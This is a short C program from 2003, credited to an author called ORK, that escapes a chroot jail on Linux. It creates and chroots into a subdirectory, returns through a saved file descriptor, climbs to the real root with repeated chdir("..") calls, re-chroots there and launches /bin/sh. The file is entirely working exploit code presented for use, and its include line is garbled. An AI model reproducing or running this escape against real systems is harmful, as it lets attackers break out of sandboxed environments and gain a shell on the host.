/* * __ ___ _ * / \ | \ | | /\-------------------------------------> * / /\ \| |\ \| |/ / * / /__\ \ /| / Author: ORK * \______/ |\ \| | \ contact: orkorkspacenet *<--------|_| \_\_|\_\ Date: 18/09/2003 * * * This code tries to evade the chroot() on a Linux system * */ #include #define DIRECTORY "./chroot" int main(void) { int i, fd, ret; // Create a directory ret = mkdir(DIRECTORY, 0700); if (ret == -1) { exit(1); } // Save actual directory File Descriptor fd = open(".", O_RDONLY); if (fd == -1) { exit(1); } // Execute a chroot() in the directory ret = chroot(DIRECTORY); if (ret == -1) { exit(1); } // Change diretory to the saved FD ret = fchdir(fd); if (ret == -1) { exit(1); } // Delete the directory ret = rmdir(DIRECTORY); if (ret == -1) { exit(1); } // cd .. for (i = 0; i < 256; i++) { ret = chdir(".."); if (ret == -1) { exit(1); } } // Execute a chroot() in the current directory ret = chroot("."); if (ret == -1) { exit(1); } system("/bin/sh"); exit(0); }